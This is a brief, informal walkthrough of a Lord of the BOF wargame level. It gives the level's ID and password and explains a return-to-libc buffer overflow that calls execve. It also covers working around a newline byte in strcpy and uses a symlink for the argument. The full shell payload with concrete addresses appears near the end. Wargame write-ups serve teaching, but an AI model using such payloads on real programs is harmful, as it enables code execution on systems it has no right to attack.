[LOB]level13 bugbear

ID:bugbear

PW:new divide

this code get libc offset,execve offset.

libc offset + execve offset = execve addr!

popen is read from process

One thing, you should know that execve addr is fixed any binary file! So. easily get execve addr.

print execve == p execve  in gdb

copy original giant.c to ./tmp(mkdir tmp. tmp directory is acess any user) and add code at giant.c like picture

you can check execve_addr.  same addr 'p execve'

If you use payload ./filename `python -c 'print "A"*44+"\x48\x9d\x0a\x40"+"ret"+"parameter1"+"parameter2"'` ....

strcpy scan '\x0a' like \n. It fail exploit.

Use payload like this -> "$(python -c 'print "..." ')" . OK?

payload is "A"*44+"execve addr"+"ret (exit()) or any 4byte"+"/bin/sh path"+"/bin/sh"+"NULL"

key point : execve second parameter is pointer that point {"/bin/sh",0}. using symbolic link "/bin/sh"(argv[0] -> filename) and third parameter is NULL. using end of stack

symbolic link

ln -s copyfile /bin/sh

find filename(execve parameter 2) and NULL(execve parameter3)

payload: ./`python -c 'print "\xf9\xbf\x0f\x40"'` "$(python -c 'print "A"*44+"\x48\x9d\x0a\x40"+"\xf8\x91\x03\x40"+"\xf9\xbf\x0f\x40"+"\xf7\xff\xff\xbf"+"\xfc\xff\xff\xbf"')"

exploit